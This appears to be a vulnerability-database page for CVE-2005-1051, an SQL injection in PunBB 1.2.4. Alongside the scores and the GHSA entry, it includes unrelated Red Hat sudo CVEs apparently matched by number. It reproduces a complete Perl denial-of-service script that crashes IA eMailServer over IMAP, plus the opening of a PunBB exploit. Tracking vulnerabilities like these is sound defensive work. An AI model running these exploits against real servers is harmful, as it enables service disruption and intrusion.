CVE-2005-1051
published 2005-05-02CVE-2005-1051: SQL injection vulnerability in profile.php in PunBB 1.2.4 allows remote authenticated users to execute arbitrary SQL commands via the id parameter in a…
PriorityP428medium6.5CVSS 2.0
AVNACLAuSCPIPAP
EXPLOIT
EPSS
2.07%
79.0th percentile
SQL injection vulnerability in profile.php in PunBB 1.2.4 allows remote authenticated users to execute arbitrary SQL commands via the id parameter in a change_email action.
Affected
18 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| punbb | punbb | — | — |
| punbb | punbb | — | — |
| punbb | punbb | — | — |
| punbb | punbb | — | — |
| punbb | punbb | — | — |
| punbb | punbb | — | — |
| punbb | punbb | — | — |
| punbb | punbb | — | — |
| punbb | punbb | — | — |
| punbb | punbb | — | — |
| punbb | punbb | — | — |
| punbb | punbb | — | — |
| punbb | punbb | — | — |
| punbb | punbb | — | — |
| punbb | punbb | — | — |
| punbb | punbb | — | — |
| punbb | punbb | — | — |
| punbb | punbb | — | — |
CVSS provenance
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
vendor_redhat7.2HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-9c26-35wc-9jmc: SQL injection vulnerability in profile
ghsa_unreviewed·2022-05-01
CVE-2005-1051 [MEDIUM] GHSA-9c26-35wc-9jmc: SQL injection vulnerability in profile
SQL injection vulnerability in profile.php in PunBB 1.2.4 allows remote authenticated users to execute arbitrary SQL commands via the id parameter in a change_email action.
Red Hat
CVE-2004-1051 bash scripts run via Sudo can be subverted (CVE-2005-4158, CVE-2006-0151)
vendor_redhat·2004-11-11·CVSS 7.2
CVE-2004-1051 [HIGH] CVE-2004-1051 bash scripts run via Sudo can be subverted (CVE-2005-4158, CVE-2006-0151)
CVE-2004-1051 bash scripts run via Sudo can be subverted (CVE-2005-4158, CVE-2006-0151)
sudo before 1.6.8p2 allows local users to execute arbitrary commands by using "()" style environment variables to create functions that have the same name as any program within the bash script that is called without using the program's full pathname.
Statement: We do not consider this to be a security issue:
http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=139478#c1
Red Hat
CVE-2004-1051 bash scripts run via Sudo can be subverted (CVE-2005-4158, CVE-2006-0151)
vendor_redhat·2004-11-11·CVSS 7.2
CVE-2005-4158 [HIGH] CVE-2004-1051 bash scripts run via Sudo can be subverted (CVE-2005-4158, CVE-2006-0151)
CVE-2004-1051 bash scripts run via Sudo can be subverted (CVE-2005-4158, CVE-2006-0151)
Sudo before 1.6.8 p12, when the Perl taint flag is off, does not clear the (1) PERLLIB, (2) PERL5LIB, and (3) PERL5OPT environment variables, which allows limited local users to cause a Perl script to include and execute arbitrary library files that have the same name as library files that are included by the script.
Statement: We do not consider this to be a security issue.
https://bugzilla.redhat.com/show_bug.cgi?id=139478#c1
Red Hat
CVE-2004-1051 bash scripts run via Sudo can be subverted (CVE-2005-4158, CVE-2006-0151)
vendor_redhat·2004-11-11·CVSS 7.2
CVE-2006-0151 [HIGH] CVE-2004-1051 bash scripts run via Sudo can be subverted (CVE-2005-4158, CVE-2006-0151)
CVE-2004-1051 bash scripts run via Sudo can be subverted (CVE-2005-4158, CVE-2006-0151)
sudo 1.6.8 and other versions does not clear the PYTHONINSPECT environment variable, which allows limited local users to gain privileges via a Python script, a variant of CVE-2005-4158.
Statement: We do not consider this to be a security issue.
https://bugzilla.redhat.com/show_bug.cgi?id=139478#c1
No detection rules found.
Exploit-DB
IA eMailServer Corporate Edition 5.2.2 - Denial of Service
exploitdb·2005-06-26
CVE-2005-2083 IA eMailServer Corporate Edition 5.2.2 - Denial of Service
IA eMailServer Corporate Edition 5.2.2 - Denial of Service
---
#===== Start IAeMailServer_DOS.pl =====
#
# Usage: IAeMailServer_DOS.pl
# IAeMailServer_DOS.pl 127.0.0.1
#
# True North Software, Inc. IA eMailServer Corporate Edition
# Version: 5.2.2. Build: 1051.
#
# Download:
# http://www.tnsoft.com/
#
############################################################
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "143",
Proto => "TCP"))
{
print "Attempting to kill IA eMailServer at $ARGV[0]:143...";
sleep(1);
print $socket "0000 LOGIN hello moto\r\n";
sleep(1);
print $socket "0001 LIST 1 \%x\r\n";
close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:143\n";
}
#===== End IAeMailServer_DOS.pl =====
# milw0rm.com
Exploit-DB
PunBB 1.2.4 - 'id' SQL Injection
exploitdb·2005-04-11
CVE-2005-1051 PunBB 1.2.4 - 'id' SQL Injection
PunBB 1.2.4 - 'id' SQL Injection
---
#!/usr/bin/python
#######################################################################
# _ _ _ _ ___ _ _ ___
# | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \
# | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/
# |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_|
#
#######################################################################
# Proof of concept code from the Hardened-PHP Project
#######################################################################
#
# -= PunBB 1.2.4 =-
# change_email SQL injection exploit
#
# user-supplied data within the database is still user-supplied data
#
#######################################################################
import urllib
import getopt
import sys
import string
No writeups or analysis indexed.
2005-05-02
Published